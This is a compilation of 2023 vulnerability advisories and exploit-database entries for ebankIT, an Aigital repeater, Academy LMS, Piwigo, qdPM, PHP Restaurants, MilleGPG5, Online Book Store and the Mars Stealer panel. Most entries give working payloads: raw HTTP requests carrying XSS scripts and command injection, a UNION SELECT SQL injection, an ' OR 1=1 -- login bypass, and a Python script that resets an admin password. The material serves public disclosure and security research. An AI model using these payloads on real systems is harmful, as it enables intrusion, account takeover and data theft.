<pre><code>CVE-2023-30454<br /><br />[Description]<br />An issue was discovered in ebankIT before version 7.<br />Document Object Model based XSS exists within the<br />/Security/Transactions/Transactions.aspx<br />endpoint. Users can supply their own JavaScript within the<br />ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray<br />POST parameter that will be passed to an eval() function and executed<br />upon pressing the continue button.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Cross Site Scripting (XSS)<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />ebankIT<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />ebankIT - Omnichannel Digital Banking Platform - Version 6, patched in version 7<br /><br />------------------------------------------<br /><br />[Affected Component]<br />The endpoint existing at: /Security/Transactions/Transactions.aspx<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Code execution]<br />true<br /><br />------------------------------------------<br /><br />[Attack Vectors]<br />I discovered a Document Object Model-based Cross-Site Scripting issue<br />within the ebankIT platform. While manually inspecting the client-side<br />JavaScript code I came across the variable JSONText. This variable<br />was using the eval function to parse data passed to it through the<br />accobj variable. Knowing the eval function evaluates text as<br />JavaScript, I proceeded to locate exactly what data was passed to this<br />variable. I found that the data could be supplied by a user during a<br />Transfer request (on /Security/Transactions/Transactions.aspx), when<br />selecting which account to transfer from. To execute this XSS, I<br />intercepted our test user s Transfer request, supplied my own custom<br />JavaScript alert(4) in the<br />ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray<br />POST parameter, and pressed the continue button which resulted in<br />the payload successfully executing.<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Jake Murphy<br /></code></pre>
<pre><code># Exploit Title: Aigital Wireless-N Repeater - Command Injection<br /># Exploit Author: Matteo Mandolini<br /># Date : 13/04/2023<br /># Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/<br /># Version: Mini_Router.0.131229<br /><br />Command Injection<br /><br />POST /boafrm/formSysCmd HTTP/1.1<br />Host: 192.168.10.253<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 31<br />Origin: http://192.168.10.253<br />Connection: close<br />Referer: http://192.168.10.253/setok.htm<br />Upgrade-Insecure-Requests: 1<br /><br />sysCmd=ping+-c10+192.168.10.101<br /><br /><br /><br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : creativeitem.com │<br />│ Vendor : CreativeItem │<br />│ Software : CreativeItem - Academy Learning Management System 5.14 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'sort_by' is vulnerable to RXSS<br /><br />Path: /academy/home/courses<br /><br />https://demo.creativeitem.com/academy/home/courses?category=photoshop&price=paid&level=beginner&language=arabic&rating=2&sort_by=newestbezzi%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebrmil<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-03/2023<br />]==========================<br /><br />Piwigo - Version 13.5.0<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgments<br /> * References<br /><br />=====[ Vulnerability<br />Information]=============================================<br /> * Class: improper Neutralization of Special Elements used in an SQL Command<br />('SQL injection') [CWE-89] improper Neutralization of Special Elements used<br />in an SQL Command ('SQL Injection')<br /> * CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> * CVE-2023-26876<br /><br />=====[ Overview]========================================================<br /> * System affected : Piwigo - Version 13.5.0<br /> * Software Version : Version 13.5.0 (other versions may also be affected).<br /> * Impact : Piwigo 13.5.0 is vulnerable to SQL injection via<br />/filter_user_id parameter to the<br />admin.php?page=history&filter_image_id=&filter_user_id endpoint. An<br />attacker can exploit this by<br />executing SQL injection code to retrieve sensitive (P1) information and<br />performing unintended actions.<br /><br />=====[ Detailed<br />description]=================================================<br /><br />An authenticated user could run SQLi commands in the application and<br />retrieve sensitive information (P1) and database information. Using the<br />endpoint<br />http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To<br />explore just execute the following request:<br /><br />GET<br />/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT<br />%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--<br />HTTP/1.1<br />Host: localhost<br />Cookie: pwg_id=cookies<br /><br />Check the value contained in the *filter_image_id* variable at the request<br />response.<br /><br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br />12/Fev/2023 - Responsible disclosure was initiated with the vendor.<br /><br />17/Fev/2023 - Piwigo confirmed the issue;<br /><br />08/Mar/2023 - CVE-2023-26876 was assigned and reserved.<br /><br />09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.<br /><br />=====[ Thanks & Acknowledgments]========================================<br /><br /> * fxo,ravs<br /> * Henrique Arcoverde < henrique.arcoverde () tempest.com.br ><br /> * Tempest Security Intelligence / Tempest's Pentest Team [3]<br /><br />=====[ References ]=====================================================<br /><br />[1][https://cwe.mitre.org/data/definitions/89.html]<br /><br />[2][https://github.com/Piwigo/Piwigo/issues/1876]<br /><br />[3][https://www.tempest.com.br|http://www.tempest.com.br/]<br /><br />[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]<br /><br />=====[ EOF ]===========================================================<br /><br />--<br /><br />-- <br /><br />*Esta mensagem é para uso exclusivo de seu destinatário e pode conter <br />informações privilegiadas e confidenciais. Todas as informações aqui <br />contidas devem ser tratadas como confidenciais e não devem ser divulgadas a <br />terceiros sem o prévio consentimento por escrito da Tempest. Se você não é <br />o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste <br />caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br />mensagem.*<br /><br />*<br />*<br />*This message is intended solely for the use of its <br />addressee and may contain privileged or confidential information. All <br />information contained herein shall be treated as confidential and shall not <br />be disclosed to any third party without Tempest’s prior written approval. <br />If you are not the addressee you should not distribute, copy or file this <br />message. In this case, please notify the sender and destroy its contents <br />immediately.**<br />*<br />*<br />*<br /><br /></code></pre>
<pre><code># Exploit Title: Aigital Wireless-N Repeater - Stored Cross-Site Scripting<br /># Exploit Author: Matteo Mandolini<br /># Date : 13/04/2023<br /># Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/<br /># Version: Mini_Router.0.131229<br /><br />XSS Stored<br /><br /><br />POST /boafrm/formHomeWlanSetup HTTP/1.1<br />Host: 192.168.10.253<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 265<br />Origin: http://192.168.10.253<br />Connection: close<br />Referer: http://192.168.10.253/home.htm<br />Upgrade-Insecure-Requests: 1<br /><br />submit-url=&submit-value=&wl_onoff=0&wps_clear_configure_by_reg=0&wl_ssid=<script>alert("XSS")</script>&wl_mode=0&wl_channel=0&wl_Method=4&wl_authType=auto&wepEnabled=ON&weplength=&wepformat=&wl_wpaAuth=psk&wl_pskFormat=0&ciphersuite=aes&wpa2ciphersuite=aes&wl_pskValue=12345678&dhcp=0<br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control<br /># Date: 2023-04-28<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://millegpg.it/<br /># Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/<br /># Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe<br /># Version: 5.9.2<br /># Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913<br /># CVE: CVE-2023-25438<br /><br />MilleGPG / MilleGPG5 also known as "Governo Clinico 3"<br /><br />Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.<br /><br />Affected/tested version: MilleGPG5 5.9.2<br /><br />Summary:<br />Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the<br />Italian general practice network.<br />MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,<br />complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the<br />General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.<br /><br />Vuln desc:<br />The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some<br />files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness<br />abusing the "write" permission of the main application available to all users on the system or network.<br /><br /><br />Details:<br />Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:<br /><br />C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)<br />C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)<br />C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)<br /><br />such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA<br /><br /><br /></code></pre>
<pre><code># Exploit Title: qdPM 9.x -[bind_type] - Cross-Site Scripting<br /># Exploit Author: Or4nG.M4n<br /># Date : 4/26/2023<br /># Vendor Homepage: https://qdpm.net/<br /># Software Link: https://sourceforge.net/projects/qdpm/files/latest/download<br /># Version: 9.2 , 9.1<br /><br />XSS Reflected .<br /><br />GET http://localhost/qdpm/index.php/extraFields?bind_type=<script>alert(OR4NG)</script> HTTP/1.1<br />Host: localhost<br />User-Agent: Safari/89.0 <br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br />Cookie: skin=ColorNature; sidebar_closed=ls -al; qdPM8=rfjniks7j5mkaur7vcliou18bd<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br /></code></pre>
<pre><code># Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross<br />Site Scripting<br /># Google Dork: None<br /># Date: 4/26/2023<br /># Exploit Author: Or4nG.M4n<br /># Vendor Homepage: https://github.com/jcwebhole<br /># Software Link: https://github.com/jcwebhole/php_restaurants<br /># Version: 1.0<br /><br /><br />functions.php<br /><br />function login(){<br />global $conn;<br />$email = $_POST['email'];<br />$pw = $_POST['password'];<br /><br />$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =<br />'".md5($pw)."'"; <-- there is No filter to secure sql query<br />parm[email][password]<br />$result = $conn->query($sql);<br />if ($result->num_rows > 0) {<br />while($row = $result->fetch_assoc()) {<br />setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day<br />header('location: index.php');<br />}<br />} else {<br />header('location: login.php?m=Wrong Password');<br />}<br /><br />}<br /><br />login bypass at admin page /rest1/admin/login.php<br /><br />email & password : ' OR 1=1 -- <- add [space] end of the payload<br /><br />cross site scripting main page /index.php<br /><br />xhttp.open("GET", "functions.php?f=getRestaurants<?php<br /> if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we<br />can insert our xss payload<br />?><br /> ", true);<br />xhttp.send();<br /><br /></script> <-- when you insert your'e payload don't forget to add </script><br />like<br /><br />xss payload : </script><img onerror=alert(1) src=a><br /></code></pre>
<pre><code># Exploit Title: Mars Stealer 8.3 - Admin Account Takeover<br /># Product: Mars Stelaer<br /># Technology: PHP<br /># Version: < 8.3<br /># Google Dork: N/A<br /># Date: 20.04.2023<br /># Tested on: Linux <br /># Author: Sköll - twitter.com/s_k_o_l_l<br /><br /><br />import argparse<br />import requests<br /><br />parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')<br />parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')<br />args = parser.parse_args()<br /><br />url = args.url.rstrip('/') + '/includes/settingsactions.php'<br />headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}<br />data = {"func": "savepwd", "pwd": "sköll"} #change password<br />response = requests.post(url, headers=headers, data=data)<br /><br />if response.status_code == 200:<br /> print("Succesfull!")<br /> print("New Password: " + data["pwd"])<br />else:<br /> print("Exploit Failed!")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Online Book Store 1.0 - (process.php) SQL injection<br /># Google Dork: 4/26/2023<br /># Exploit Author: Or4nG.M4n<br /># Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/<br /># Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip<br /># Version: 1.0<br /><br />* STEPS *<br />1- go to any book and add it to cart<br />2- after that u will redirected to /cart.php<br />3- click on Go To Checkout /checkout.php<br />4- inject your'e injecton code in any of this post parameters<br /><br />parameters : name address city zip_code country<br /><br /><br /> foreach($_SESSION['cart'] as $isbn => $qty){<br /> $bookprice = getbookprice($isbn);<br /> $query = "INSERT INTO order_items VALUES <====== 1<br /> ('$orderid', '$isbn', '$bookprice', '$qty')"; <====== 2<br /> $result = mysqli_query($conn, $query); <====== 3<br /> if(!$result){<br /> echo "Insert value false!" . mysqli_error($conn2); <====== 4<br /> exit;<br /> }<br /> }<br /></code></pre>